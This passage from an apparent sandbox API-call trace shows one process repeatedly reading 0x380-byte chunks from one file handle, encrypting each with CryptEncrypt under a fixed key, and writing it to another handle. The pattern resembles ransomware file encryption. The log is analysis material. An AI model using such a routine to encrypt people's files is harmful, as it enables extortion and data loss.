pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.230] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.230] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.230] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.230] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.230] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.230] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.230] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.230] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.230] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.230] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.230] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.231] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.231] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.231] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.231] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.231] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.231] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.231] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.231] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.231] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.231] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.231] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.231] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.239] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.239] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.239] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.239] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.239] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.239] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.239] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.239] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.240] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.240] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.240] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.240] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.240] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.240] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.240] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.240] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.240] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.240] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.241] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.241] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.241] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.241] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.241] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.241] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.241] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.241] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.241] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.241] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.241] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.241] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.242] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.242] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.242] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.242] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.242] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.242] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.242] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.242] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.243] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.243] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.243] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.243] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.243] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.243] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.243] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.243] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.243] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.243] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.244] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.244] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.244] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.244] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.244] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.244] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.244] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.244] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.244] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.244] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.244] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.244] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.245] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.245] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.245] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.245] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.245] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.245] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.245] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.245] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.245] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.245] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.245] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.245] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.246] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.246] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.246] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.246] CryptEncrypt (in: hKey=0x2fb688, 